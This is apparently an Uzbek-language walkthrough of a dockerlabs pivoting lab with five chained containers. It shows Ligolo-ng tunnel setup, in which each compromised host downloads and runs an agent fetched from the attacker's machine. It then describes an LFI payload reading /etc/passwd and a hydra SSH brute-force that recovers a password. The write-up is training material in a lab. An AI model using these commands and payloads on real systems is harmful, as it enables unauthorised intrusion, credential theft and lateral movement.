by Muhammad Abdulloh πΊ
IP address |
10.10.10.2 β 20.20.20.0/24 β 30.30.30.0/24 β 40.40.40.0/24 β 50.50.50.0/24 |
|---|---|
Operatsion Tizim Nomi (Distribution) |
Debian/Ubuntu asosidagi Linux konteynerlar (Kali 6.12.25 β dockerlab muhiti) |
Web Server |
Apache httpd 2.4.52/2.4.57/2.4.58 (Ubuntu/Debian), Grafana v8.3.0 (40.40.40.3:3000) |
Ochiq Portlar |
21/tcp (FTP), 22/tcp (SSH), 80/tcp (HTTP), 3000/tcp (Grafana) |

<aside> π‘
[ Kali Linux ] ββ(10.10.10.0/24)βββΊ ββββββββββββββββββ ββ(20.20.20.0/24)βββΊ ββββββββββββββββββ ββ(30.30.30.0/24)βββΊ ββββββββββββββββββ ββ(40.40.40.0/24)βββΊ ββββββββββββββββββ ββ(50.50.50.0/24)βββΊ βββββββββββββββββββββββββ
β inclusion β β trust β β upload β β move β β whereismywebshell β
β 10.10.10.2 β β 20.20.20.3 β β 30.30.30.3 β β 40.40.40.3 β β 50.50.50.3 β
β 20.20.20.2 β β 30.30.30.2 β β 40.40.40.2 β β 50.50.50.2 β βββββββββββββββββββββββββ
ββββββββββββββββββ ββββββββββββββββββ ββββββββββββββββββ ββββββββββββββββββ
</aside>
**# === BOSHLANG'ICH SOZLASH ===
cd ~/PivotingTools
sudo ./proxy -selfcert
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# === 1-PIVOT: inclusion.tar (10.10.10.2/20.20.20.2) ===
# Target'da:
wget http://<kali_ip>:8000/agent
chmod +x agent
./agent -connect <kali_ip>:11601 -ignore-cert
# Ligolo konsolida:
session
# > 1 - root@055bb84caed8
start
# Kali'da:
sudo ip route add 20.20.20.0/24 dev ligolo
# === 2-PIVOT: trust.tar / mario (20.20.20.3/30.30.30.2) ===
# Ligolo konsolida (session 1 tanlangan holda):
session
# > 1 - root@055bb84caed8
listener_add --addr 20.20.20.2:11601 --to 127.0.0.1:11601
# Mario shell'ida:
./agent -connect 20.20.20.2:11601 -ignore-cert
# Kali'da:
sudo ip tuntap add user $(whoami) mode tun ligolo2
sudo ip link set ligolo2 up
session
# > 2 - mario@33dcd4b03b42
start --tun ligolo2
sudo ip route add 30.30.30.0/24 dev ligolo2
# === 3-PIVOT: upload.tar (5cff3be4d2dc, 30.30.30.3/40.40.40.2) ===
session
# > 2 - mario@33dcd4b03b42
listener_add --addr 30.30.30.2:11601 --to 127.0.0.1:11601
listener_add --addr 30.30.30.2:8000 --to 127.0.0.1:8000
# 30.30.30.3 shell'ida:
wget <http://30.30.30.2:8000/agent>
chmod +x agent
./agent -connect 30.30.30.2:11601 -ignore-cert
# Kali'da:
sudo ip tuntap add user $(whoami) mode tun ligolo3
sudo ip link set ligolo3 up
session
# > 3 - root@5cff3be4d2dc
start --tun ligolo3
sudo ip route add 40.40.40.0/24 dev ligolo3
# === 4-PIVOT: move.tar / freddy (40.40.40.3/50.50.50.x) ===
session
# > 3 - root@5cff3be4d2dc
listener_add --addr 40.40.40.2:11601 --to 127.0.0.1:11601
listener_add --addr 40.40.40.2:8000 --to 127.0.0.1:8000
# Freddy shell'ida:
wget <http://40.40.40.2:8000/agent>
chmod +x agent
./agent -connect 40.40.40.2:11601 -ignore-cert
# Kali'da:
sudo ip tuntap add user $(whoami) mode tun ligolo4
sudo ip link set ligolo4 up
session
# > 4 - freddy@29958785de76
start --tun ligolo4
sudo ip route add 50.50.50.0/24 dev ligolo4**
<aside> π‘
</aside>
Birinchi target (10.10.10.2) nmap -sV -sC bilan skanerlandi: 22/tcp (OpenSSH 9.2p1 Debian) va 80/tcp (Apache 2.4.57 Debian) ochiq topildi. 80-portda standart Apache2 sahifasi boβlgani uchun ffuf bilan katalog fuzzing boshlandi β root darajada /shop topildi, ichida esa index.php aniqlandi. /shop sahifasida pastda System error: $GET['archivo'] xabari LFI (Local File Inclusion) zaifligini fosh qildi. index.php?archivo=../../../../../etc/passwd orqali /etc/passwd oβqildi va uchta foydalanuvchi (root, seller, manchi) aniqlandi β bu roβyxat keyingi brute-force bosqichi uchun saqlab qoβyildi.







Topilgan foydalanuvchi roβyxati (root, seller, manchi) bilan hydra orqali SSH brute-force qilindi. Natijada manchi:lovely kombinatsiyasi topildi va ssh [email protected] orqali muvaffaqiyatli kirildi.